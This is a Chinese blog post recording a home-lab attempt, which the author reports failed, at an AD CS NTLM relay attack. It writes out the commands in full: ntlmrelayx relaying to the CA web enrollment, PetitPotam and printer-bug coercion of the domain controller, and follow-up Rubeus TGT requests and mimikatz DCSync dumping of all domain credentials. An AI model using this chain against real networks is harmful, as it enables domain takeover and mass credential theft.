• ADCS relay攻击(失败)


    先说说我的环境

    攻击机 192.168.149.139 Kali
    DC主机 192.168.149.211    win2012 R2
    AD CS   192.168.149.213     win2008 R2

    可能是ADCS服务器不能用win08的吧

     先用攻击机简单试探一下,看看curl能不能ok,curl 192.168.149.213/certsrv/ -I,然后看看我们的证书,certutil -config - -ping

     环境简单测试没有问题,现在开始切入正题,始终抓不到,妈的

    python3 ntlmrelayx.py -debug -smb2support --target http://192.168.149.213/certsrv/certfnsh.asp --adcs --template DomainController

    ADCS执行

    PetitPotam.exe 192.168.149.139 192.168.149.211 1

    攻击成功,然而并没有弹过来,淦

    python3 ntlmrelayx.py -t http://192.168.149.213/certsrv/certfnsh.asp -smb2support --adcs 

    kali执行

    python3 ntlmrelayx.py -debug -smb2support --target http://192.168.149.213/certsrv/certfnsh.asp --adcs --template DomainController

    ADCS执行

    SpoolSample.exe 192.168.149.211 192.168.149.139

    kali执行

    python3 printerbug.py leecinsy/administrator:password@192.168.149.211 192.168.149.139

    失败

     python3 ntlmrelayx.py -t http://192.168.149.213/certsrv/certfnsh.asp -smb2support --adcs

    ADCS执行

    PetitPotam.exe 192.168.149.139 192.168.149.211 1

    失败

    那就先假装我抓到了,后续的步骤是

    Rubeus.exe asktgt /outfile:kirbi /user:DC机器名 /ptt /certificate:<Base64> 

    lsadump::dcsync /domain:leecinsy.com /all /csv      //dcsync攻击

    后续

    可能太菜了,最主要是要清楚攻击的流程和步骤

  • 相关阅读:
    Python3中最常用的5种线程锁你会用吗
    学会使用Python的threading模块、掌握并发编程基础
    数据结构与算法Python版 熟悉哈希表,了解Python字典底层实现
    博客导读
    分享canvas的一个小案例
    Php中的魔术方法
    进制简介
    Gojs学习史(一):基本定义
    Vue读书笔记:关于$ref、props和$emit
    Leaflet学习笔记(一)
  • 原文地址:https://www.cnblogs.com/xinxin999/p/16100772.html
Copyright © 2020-2023  润新知